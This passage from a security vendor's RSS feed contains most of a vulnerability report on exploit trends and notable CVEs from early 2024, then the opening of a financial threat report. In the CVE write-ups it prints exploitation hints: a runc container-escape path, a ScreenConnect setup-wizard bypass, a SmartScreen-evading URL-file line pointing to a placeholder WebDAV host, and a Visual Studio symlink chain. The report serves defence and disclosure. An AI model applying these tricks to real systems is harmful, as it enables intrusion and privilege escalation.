339. <div id="attachment_112557" style="width: 972px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112557" class="size-full wp-image-112557" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" alt="A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR" width="962" height="535" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png 962w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-300x167.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-768x427.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-270x150.png 270w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-629x350.png 629w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-740x412.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-503x280.png 503w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-800x445.png 800w" sizes="(max-width: 962px) 100vw, 962px" /></a><p id="caption-attachment-112557" class="wp-caption-text">A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR</p></div>
340. <div id="attachment_112558" style="width: 963px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112558" class="size-full wp-image-112558" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" alt="A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions" width="953" height="608" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-300x191.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-768x490.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-549x350.png 549w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-740x472.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-439x280.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-800x510.png 800w" sizes="(max-width: 953px) 100vw, 953px" /></a><p id="caption-attachment-112558" class="wp-caption-text">A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions</p></div>
341. <h3 id="most-prevalent-exploits">Most prevalent exploits</h3>
342. <p>We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:</p>
343. <ul>
344. <li>Browsers;</li>
345. <li>Operating systems (Windows, Linux, macOS);</li>
346. <li>Microsoft Exchange servers and server components;</li>
347. <li>Microsoft SharePoint servers and server components;</li>
348. <li>The Microsoft Office suite;</li>
349. <li>All other applications that fall outside the five categories above.</li>
350. </ul>
351. <p>Let&#8217;s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.</p>
352. <div class="js-infogram-embed" data-id="_/3GTp2brFdNLmDsvrvg0O" data-type="interactive" data-title="07 EN Vulnerability report graphs" style="min-height:;"></div>
353. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091149/07-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
354. <div class="js-infogram-embed" data-id="_/W4TJxSPFu2utI4NI3xWc" data-type="interactive" data-title="08 EN Vulnerability report graphs" style="min-height:;"></div>
355. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091036/08-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
356. <p>The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:</p>
357. <ul>
358. <li>Operating systems;</li>
359. <li>Browsers.</li>
360. </ul>
361. <p>However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the &#8220;other software&#8221; category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.</p>
362. <h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2>
363. <p>Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.</p>
364. <div id="attachment_112567" style="width: 1610px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112567" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" alt="" width="1600" height="1086" class="size-full wp-image-112567" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-1536x1043.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-800x543.png 800w" sizes="(max-width: 1600px) 100vw, 1600px" /></a><p id="caption-attachment-112567" class="wp-caption-text">The top 10 vulnerabilities exploited in APT attacks, 2023</p></div>
365. <div id="attachment_112568" style="width: 1610px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112568" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" alt="" width="1600" height="1086" class="size-full wp-image-112568" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-1536x1043.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-800x543.png 800w" sizes="(max-width: 1600px) 100vw, 1600px" /></a><p id="caption-attachment-112568" class="wp-caption-text">The top 10 vulnerabilities exploited in APT attacks, Q1 2024</p></div>
366. <p>The statistics presented above indicate that popular entry points for malicious actors currently are:</p>
367. <ul>
368. <li>Vulnerable remote access services like Ivanti or ScreenConnect.</li>
369. <li>Vulnerable access control features like Windows SmartScreen.</li>
370. <li>Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.</li>
371. </ul>
372. <p>Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).</p>
373. <h2 id="notable-q1-2024-vulnerabilities">Notable Q1 2024 vulnerabilities</h2>
374. <p>This section deals with the most interesting vulnerabilities registered in Q1 2024.</p>
375. <h3 id="cve-2024-3094-xz">CVE-2024-3094 (XZ)</h3>
376. <p>A <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">backdoor</a> was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Upon loading such a library, the malicious code would begin modifying functions in memory that are exported by certain distributions for SSH server operation, enabling the attackers to send commands to the infected server.</p>
377. <p>The backdoor&#8217;s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.</p>
378. <h3 id="cve-2024-20656-visual-studio">CVE-2024-20656 (Visual Studio)</h3>
379. <p>This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any users can do whatever they wish to these. The vulnerability is intriguing due to its exploitation algorithm.</p>
380. <p>The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir =&gt; Global\\GLOBALROOT\\RPC Control =&gt; TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.</p>
381. <p>This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.</p>
382. <p>We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36874" target="_blank" rel="noopener">CVE-2023-36874</a>, which malicious actors began exploiting even before it was discovered.</p>
383. <h3 id="cve-2024-21626-runc">CVE-2024-21626 (runc)</h3>
384. <p>OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.</p>
385. <p>The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call&#8217;s characteristic feature is the method by which it launches a child process, which is copied from the parent process.</p>
386. <p>This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to monitor such data, this can lead to a data disclosure vulnerability <a href="https://cwe.mitre.org/data/definitions/403.html" target="_blank" rel="noopener">CWE-403</a> – Exposure of File Descriptor to Unintended Control Sphere, according to the <a href="https://cwe.mitre.org/" target="_blank" rel="noopener">CWE category system</a>.</p>
387. <p>CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers; therefore, a running container acts as a child process relative to runc. If you try accessing <em>/proc/self</em> directory from that container, you can obtain descriptors for all files opened by the runc process. Navigation of accessible resources and descriptors in Linux follows file system rules. Hence, attackers quickly started using the relative path to interpreters accessible to the parent process to escape the container.</p>
388. <p>You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:</p>
389. <p style="text-align: center;font-size: 80%">/proc/self/cwd/../</p>
390. <h3 id="cve-2024-1708-screenconnect">CVE-2024-1708 (ScreenConnect)</h3>
391. <p>ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.</p>
392. <p>Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application&#8217;s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a &#8220;/&#8221; character to the original request URL like this: <span style="font-size: 80%">http://vuln.server/SetupWizard.aspx</span>. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.</p>
393. <p>The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server&#8217;s web interface.</p>
394. <h3 id="cve-2024-21412-windows-defender">CVE-2024-21412 (Windows Defender)</h3>
395. <p>The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/" target="_blank" rel="noopener">SmartScreen Filter</a>. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.</p>
396. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112559" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" alt="" width="666" height="248" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png 666w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04-300x112.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></a></p>
397. <p>Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.</p>
398. <p>Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.</p>
399. <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112560" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" alt="" width="395" height="234" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png 395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05-300x178.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></a></p>
400. <p>This can be achieved by interacting with a file stored in a network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:</p><pre class="crayon-plain-tag">URL=file://ip_address@port/webdav/TEST.URL</pre><p>
401. <h3 id="cve-2024-27198-teamcity">CVE-2024-27198 (TeamCity)</h3>
402. <p>This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:</p>
403. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112561" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" alt="" width="398" height="40" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06-300x30.png 300w" sizes="(max-width: 398px) 100vw, 398px" /></a></p>
404. <p>The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.</p>
405. <p>Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.</p>
406. <h3 id="cve-2023-38831-winrar">CVE-2023-38831 (WinRAR)</h3>
407. <p>Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.</p>
408. <p>This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.</p>
409. <p>Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:</p>
410. <ul>
411. <li>ZIP archives;</li>
412. <li>RAR archives.</li>
413. </ul>
414. <p>The variations in malware and existing archives make it impossible to determine definitively whether an archive is an exploit. However, we can identify key characteristics of an exploit:</p>
415. <ul>
416. <li>The archive contains files whose names match those of subdirectories.</li>
417. <li>At least one file name contains a space before the extension.</li>
418. <li>The archive must contain an executable located inside the subdirectory.</li>
419. </ul>
420. <p>Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:</p>
421. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112562" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" alt="" width="872" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-768x144.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-740x139.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-800x150.png 800w" sizes="(max-width: 872px) 100vw, 872px" /></a></p>
422. <p>For RAR files, like this:</p>
423. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112563" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" alt="" width="861" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png 861w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-300x200.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-768x513.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-524x350.png 524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-740x494.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-419x280.png 419w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-800x534.png 800w" sizes="(max-width: 861px) 100vw, 861px" /></a></p>
424. <p>Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.</p>
425. <h2 id="conclusions-and-advice">Conclusions and advice</h2>
426. <p>In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:</p>
427. <ul>
428. <li>Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.</li>
429. <li>Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions can assist you in this endeavor.</li>
430. <li>Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your We recommend our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a> suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.</li>
431. </ul>
432. ]]></content:encoded>
434. <wfw:commentRss>https://securelist.com/vulnerability-report-q1-2024/112554/feed/</wfw:commentRss>
435. <slash:comments>0</slash:comments>
438. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
439. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
440. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
441. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
442. </item>
443. <item>
444. <title>Financial cyberthreats in 2023</title>
445. <link>https://securelist.com/financial-threat-report-2023/112526/</link>
446. <comments>https://securelist.com/financial-threat-report-2023/112526/#respond</comments>
448. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
449. <pubDate>Mon, 06 May 2024 10:00:31 +0000</pubDate>
450. <category><![CDATA[Publications]]></category>
451. <category><![CDATA[Emotet]]></category>
452. <category><![CDATA[Financial malware]]></category>
453. <category><![CDATA[Fraud]]></category>
454. <category><![CDATA[Google Android]]></category>
455. <category><![CDATA[Microsoft Windows]]></category>
456. <category><![CDATA[Mobile Malware]]></category>
457. <category><![CDATA[Phishing]]></category>
458. <category><![CDATA[QakBot]]></category>
459. <category><![CDATA[Trojan Banker]]></category>
460. <category><![CDATA[ZeuS]]></category>
461. <category><![CDATA[Financial threats]]></category>
462. <category><![CDATA[Mobile threats]]></category>
463. <category><![CDATA[Spam and Phishing]]></category>
464. <category><![CDATA[Windows malware]]></category>
465. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112526</guid>
466.  
467. <description><![CDATA[In this report, we share our insights into the 2023 trends and statistics on financial threats, such as phishing, PC and mobile banking malware.]]></description>
468. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With <a href="https://www.statista.com/outlook/fmo/digital-payments/worldwide#transaction-value" target="_blank" rel="noopener">trillions of dollars</a> of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.</p>
469. <h2 id="methodology">Methodology</h2>
470. <p>In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).</p>
471. <h2 id="key-findings">Key findings</h2>
472. <h3 id="phishing">Phishing</h3>
473. <ul>
474. <li>Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.</li>
475. <li>Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.</li>
476. <li>PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.</li>
477. <li>Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.</li>
478. </ul>
479. <h3 id="pc-malware">PC malware</h3>
480. <ul>
481. <li>The number of users affected by financial malware for PCs dropped by 11% from 2022.</li>
482. <li>Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.</li>
483. <li>Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.</li>
484. </ul>
485. <h3 id="mobile-malware">Mobile malware</h3>
486. <ul>
487. <li>The number of Android users attacked by banking malware increased by 32% compared to the previous year.</li>
488. <li>Agent was the most active mobile malware family, making up 38% of all Android attacks.</li>
489. <li>Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.</li>
490. </ul>
491. <h2 id="financial-phishing">Financial phishing</h2>
492. <p>In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.</p>
493. <p>This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.</p>
494. <div class="js-infogram-embed" data-id="_/boYLMQpWpL1GXYlETIxb" data-type="interactive" data-title="01 EN Financial report graphs" style="min-height:;"></div>
495. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082640/01-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
496. <div class="js-infogram-embed" data-id="_/3ZS8RqMMAvJhiI8jSaTS" data-type="interactive" data-title="02 EN Financial report graphs" style="min-height:;"></div>
497. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082651/02-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
498. <p>Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).</p>
499. <div class="js-infogram-embed" data-id="_/G18VozQq8HHirkKRgi8i" data-type="interactive" data-title="03 EN Financial report graphs" style="min-height:;"></div>
